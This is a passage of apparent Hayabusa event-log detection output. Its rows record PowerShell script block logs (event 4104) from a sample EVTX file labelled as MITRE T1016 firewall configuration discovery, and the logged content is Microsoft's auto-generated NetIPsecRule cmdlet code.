[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,eterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue =,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', 
PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
